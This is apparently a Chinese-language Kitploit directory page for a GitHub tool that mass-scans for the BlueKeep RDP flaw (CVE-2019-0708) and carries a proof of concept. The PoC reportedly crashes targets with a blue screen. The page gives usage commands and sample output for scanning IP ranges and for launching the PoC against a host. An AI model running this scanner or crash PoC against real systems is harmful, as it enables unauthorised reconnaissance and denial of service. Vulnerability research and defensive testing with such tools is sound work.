Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-0708 — CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。 | Kitploit
工具/GitHubGitHub/skommando/cve-2019-0708
侦察漏洞扫描器漏洞利用信息收集渗透测试
GitHubskommando/cve-2019-0708

CVE-2019-0708

CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。

查看仓库
226年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-0708

CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。

0x01 扫描 - windows

usage:
rdpscan.exe ip1-ip2

root@kitploit:~
> .\rdpscan.exe 192.168.1.1-192.168.1.2
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required

rdpscan.exe --file ip.txt

root@kitploit:~
> .\rdpscan.exe --file ip.txt
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required

0x02 POC利用

usage:
python poc.py ip 系统位数

root@kitploit:~
> python .\cve-2019-0708-poc.py 192.168.1.1 32
[+] ClientData Packet Sent
[+] ChannelJoin/ErectDomain/AttachUser Sent
[+] ClientInfo Packet Sent
[+] ConfirmActive Packet Sent
[+] Session Established
[+] Vuln Should Trigger
下载工具